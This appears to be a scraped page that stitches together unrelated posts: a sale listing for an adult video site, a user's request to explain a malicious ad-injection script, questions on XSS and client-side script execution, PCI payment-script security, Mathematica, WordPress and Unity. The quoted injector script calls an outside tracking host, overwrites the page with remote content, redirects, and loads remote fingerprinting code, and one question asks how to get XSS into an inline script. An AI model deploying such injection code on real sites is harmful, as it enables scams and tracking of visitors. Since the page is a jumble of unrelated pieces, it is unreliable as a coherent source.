[NSFW] DreamyTransexuals.com + WP script license and plugin

Why are you selling this site?
Need the money

How is it monetized?
Using http://exoclick.com/

Does this site come with any social media accounts?
Yeah, twitter account with over 2k followers and loads of tweets

How much time does this site take to run?
Very little

What challenges are there with running this site?
Increasing traffic, removing videos that were removed from pornhub.com,….

FB ads with script injectors [closed]

This is my first post so I am really sorry for my English and may not logical sentences, if something not clear write it I will explain it. 🙂

Few months ago I started notices strange different ads in Facebook (all of them were saying you can get rich and have Ferrari by doing this “xx” in one week as person [In every ad that person was added as he did it he knows the way how to get rich he is sharing his own advice and you need click on it In ads photo]. At first look those ads looked like legitimate, then I checked links of site and it did not matched plus title of add were untrue [that person in photo did not have Ferrari or 1 MK Eur] so I suspected scammers or else..

I reported all of them but they were creating more of them to make people click on them, so one day by mistake I clicked on that site on fresh os {without sandbox} and I get scared of being exploited by just clicking ad lol, so I started to look into that website and I found that they injecting script {that script Injector part will probably be malicious and it works over xhr it seems, there is few scripts I will post below I would like to get what do you think about them because I don’t have much knoweldge about and I want to understand how it works and what it does...}

***Can you help me understand what purposes of these scripts are, and what for?****(scripts below)*

One of many js scripts:

(function() { if (window.location.href.search("[?&]_novisit=on") != -1) return; var xhr = new XMLHttpRequest(); xhr.withCredentials = true; xhr.open("GET", "http://tracksystem1.com/_remote_track?campaign=" + escape("eQ7oRjqn4h") + "&referrer=" + escape(document.referrer) + "&uri=" + escape(window.location.href), true); xhr.onload = function() {     if (xhr.status !== 200) return;     if (xhr.getResponseHeader("Struct-Response") !== "true") {         document.open();         document.write(xhr.responseText);         document.close();         return;     }     var resp = JSON.parse(xhr.responseText);     if (resp.result === "redirect") {         document.open();         document.write('<html><head>');         document.write('<meta name="referrer" content="never" />');         document.write('<meta http-equiv="refresh" content="0; url='+resp.redirect_url+'" />');         document.write('</head></html>');         document.close();         return;     }     if (resp.result === "fp") {         var cb = function() {             fp.init(resp.fp.data_url, "", resp.fp.checks, true);         };         var ref = document.getElementsByTagName("script")[0];         var script = document.createElement("script");         script.type = "text/javascript";         if (script.readyState) {  //IE             script.onreadystatechange = function() {                 if (script.readyState == "loaded" || script.readyState == "complete") {                     script.onreadystatechange = null;                     cb();                 }             };         } else {             script.onload = cb;         }         script.src = resp.fp.script_url;         ref.parentNode.insertBefore(script, ref);         return     } }; xhr.send(); })();    I add other scripts by links sorry for that they were too.. 

Link 1.

https://cdn.shopify.com/s/javascripts/tricorder/trekkie.storefront.min.js?v=2019.11.04.1 

Link 2.

https://cdn.shopify.com/s/files/1/0306/6288/5514/t/1/assets/lazysizes.js?v=9422402313628365795 

Link 3.

https://cdn.shopify.com/s/files/1/0306/6288/5514/t/1/assets/vendor.js?v=1200183919454698418 

Link 4. (sorry long long code…)

https://cdn.shopify.com/s/files/1/0306/6288/5514/t/1/assets/theme.js?v=7761725207979859454 

Link 5.

https://cdn.shopify.com/s/assets/shop_events_listener-09875a9a2b286acf534498184c24b199675a6097a941992d0979e5295d2cf9e9.js 

Link 6.

https://cdn.shopify.com/s/assets/storefront/load_feature-98ef862814fe2952ed0893b184775afe7f06464f1ff22ee18736b6431a6c6317.js 

Link 7.

https://cdn.shopify.com/s/assets/storefront/features-4213bd6d119d33741849bb3a48d551b05323182f2fc715e4461c20b760628ed2.js Link 8. 

https://cdn.shopify.com/shopifycloud/boomerang/shopify-boomerang-1.0.0.min.js

Link 9. 

https://cdn.shopify.com/shopifycloud/payment-sheet/assets/latest/spb.en.js

link 10 

https://cdn.shopify.com/shopifycloud/payment-sheet/assets/latest/f9ca74cf37059edba4aa.0.en.js

link 11 

https://cdn.shopify.com/shopifycloud/payment-sheet/assets/latest/bbeb2da948901f4282fa.5.en.js

  

Is there a vulnerability other than XSS which can result in client side script execution?

If the intention of attacker is to execute an arbitrary client side script in the context of a web application, is XSS the only possible attack other than compromising the server with an RCE or a sub-resource supply chain attack? I am looking for attacks which can be mitigated by an application owner rather than attacks which the application cannot control.

  • XSS is Cross Site Scripting – Be it reflected, persistent or DOM based.
  • A sub-resource supply chain attack is where you compromise a sub resource such as CSS, javascript, flash objects etc by compromising the supply chain ie; compromising the CDNs, S3 buckets etc or by MITM a subresource loaded over non-https channel.

ReplaceRepeated with special characters: Double-struck and Script

Following the advice here, I tried to replace part of an expression guided by the FullForm details:

-B + b - ((-A +        a) \[\[DoubleStruckCapitalE]][(-A + a) (-B +           b) | \[ScriptCapitalF]])/\[DoubleStruckCapitalE][(-A +         a)^2 | \[ScriptCapitalF]] & // FullForm 

Function[Plus[Times[-1, B], b, Times[-1, Times[Plus[Times[-1, A], a], [DoubleStruckCapitalE][ Alternatives[ Times[Plus[Times[-1, A], a], Plus[Times[-1, B], b]], [ScriptCapitalF]]], Power[ [DoubleStruckCapitalE][ Alternatives[ Power[Plus[Times[-1, A], a], 2], [ScriptCapitalF]]], -1]]]]]

However, the replacement rule still does not take effect

{-B + b - ((-A +         a) \[DoubleStruckCapitalE][(-A + a) (-B +            b) | \[ScriptCapitalF]])/\[DoubleStruckCapitalE][(-A +          a)^2 | \[ScriptCapitalF]] &} //. {\[DoubleStruckCapitalE][     Alternatives[      Power[Plus[Times[-1, a_], b_], 2], \[ScriptCapitalF]]] ->     Power[Plus[Times[-1, a], b], 2]} 

I’m obviously struggling how to do things in MMA. Appreciate any hints or tips.

JQuery function inside Script Tag. How to execute XSS in such a scenario?

The value of currentPage: can be controlled by the user. All characters (like: " ' ( ) / ; : except < & > are injected without being sanitized.

Is there any possible way to execute XSS in such a scenario?

<script type="text/javascript"> $  (function() {             $  ("#blog-pagi").pagination({                 items: 9,                 itemsOnPage: 6,                 currentPage: inject payload here                 edges: 0,                 displayedPages: 10,                 hrefTextPrefix:"?page=",                 prevText: "<i class=\"fa fa-chevron-left\" ></i>",                 nextText: "<i class=\"fa fa-chevron-right\" ></i>",                 onPageClick: function(pageNumber,event){                     window.history.replaceState(null, null, "?page="+pageNumber);                 },             });             });             </script> 

In page Payment script security needs

Currently, I’m working in a Fintech StartUp. We have already implemented our payment solution with redirect in a checkout page hosted in our domain (like https://stripe.com/docs/payments/checkout).

Now, we are going to implement a solution that allow payments directly in the merchants page, but in order to maintain PCI complaint also in the merchants page we need to provide a script, that the merchant can insert in their website, where the sensitive data is collected and forwarded to our APIs (like https://stripe.com/docs/payments/accept-a-payment).

I have to write a JavaScript script that enables “in page” merchant payments, but I don’t find in any places a list of the security needs.

Checking several PSP that provide the same functionality I find some of security needs:

  1. The script and the form that collect sensitive data must be hosted in the PSP domain and inserted in the merchant webpage with an iFrame.
  2. The ids of inputs on the form that collect Credit card data must be randomly generated.
  3. The merchants website must load the script directly from our domain in order to remain PCI complaint (There is any way to check this point?).
  4. Javascript file must be minified and uglified.

My questions: are there any document that explains all the recommended security needs of this typology of script? Otherwise, is my security list enough? Are there some errors in my list?

eSports Gaming Plugins / Script

my question is regarding for Gaming / eSports, There are some gaming website where if you register there and out your PSN / XBox / Steam Id its sync with your gaming account and show all gaming details. and my questions is this feature available in WordPress if yes then share with Plugins and if not then which script this kind of feature allow

How to manage game-object script component and values in new updated model in unity

I have a large object that contains so many gameobject (the fbx) and it attached several mono behaviour script with different values assigned publicly in inspector. Now the problem is each time we update the model in project (FBX in project) we have to drag and drop the model/FBX again. It means that we have to attach all the scripts again with the relevant values/Data. I am currently looking for right way to do this job. Currently I place both new and old fbx in the scene and then one by one i copy paste the old object’s script component into new object. Then i delete the old one object/model/fbx.

Note: I have bring the fbx again in hirarachy because sometime the object not properly update in the scene.

How to use GameManager to get GameOver() from another script?

I’m trying to make a gameover-text show when the player is leaving the plane-area. In GameManager.cs I’ve written:

    public void GameOver()     {         gameOverText.gameObject.SetActive(true);     } 

And in PlayerController.cs I’ve used the following code:

    private GameManager gameManager; 

and:

    void Update()     {         float horizontalInput = Input.GetAxis("Horizontal");         float verticalInput = Input.GetAxis("Vertical");          playerRb.AddForce(Vector3.right * speed * horizontalInput);         playerRb.AddForce(Vector3.forward * speed * verticalInput);          if (transform.position.y < -4)         {             gameManager.GameOver();         }     } 

But this doesn’t really work, and the console is giving me this message:

Assets/Scripts/PlayerController.cs(8,25): warning CS0649: Field ‘PlayerController.gameManager’ is never assigned to, and will always have its default value null

I’ve already used the OnTriggerEnter (for powerups) and OnCollisionEnter (for enemies). How can I get the GameOver-text to show when the player leaves the “Plane”?